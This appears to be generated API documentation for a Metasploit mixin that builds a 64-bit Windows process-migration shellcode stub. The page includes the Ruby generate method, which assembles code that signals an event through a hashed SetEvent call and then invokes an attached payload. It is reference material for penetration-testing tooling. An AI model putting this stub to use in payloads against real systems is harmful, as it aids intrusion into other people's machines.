Module: Msf::Payload::Windows::MigrateCommon_x64

Includes:

Msf::Payload::Windows, BlockApi_x64

Included in:

MigrateHttp_x64, MigrateNamedPipe_x64, MigrateTcp_x64

Defined in:

lib/msf/core/payload/windows/x64/migrate_common_x64.rb

Overview

Not really a payload, but more a mixin that lets common functionality live in spot that makes sense, so that code duplication is reduced.

Instance Method Summary

• #generate(opts = {}) ⇒ Object

  Constructs the migrate stub on the fly.

Methods included from BlockApi_x64

#asm_block_api

Methods included from Msf::Payload::Windows

#apply_prepends, exit_types, #handle_intermediate_stage, #include_send_uuid, #initialize, #replace_var

Methods included from PrependMigrate

#apply_prepend_migrate, #initialize, #prepend_migrate, #prepend_migrate?, #prepend_migrate_64

Instance Method Details

#generate(opts = {}) ⇒ Object

Constructs the migrate stub on the fly

# File 'lib/msf/core/payload/windows/x64/migrate_common_x64.rb', line 20

def generate(opts={})
  asm = %Q^
  migrate:
    cld
    mov rsi, rcx
    sub rsp, 0x2000
    and rsp, ~0xF
    call start
    #{asm_block_api}
  start:
    pop rbp
  #{generate_migrate(opts)}
  signal_event:
    mov rcx, qword [rsi] ; Event handle is pointed at by rsi
    mov r10d, #{Rex::Text.block_api_hash('kernel32.dll', 'SetEvent')}
    call rbp            ; SetEvent(handle)
  call_payload:
    call qword [rsi+8]  ; Invoke the associated payload
  ^

  Metasm::Shellcode.assemble(Metasm::X64.new, asm).encode_string
end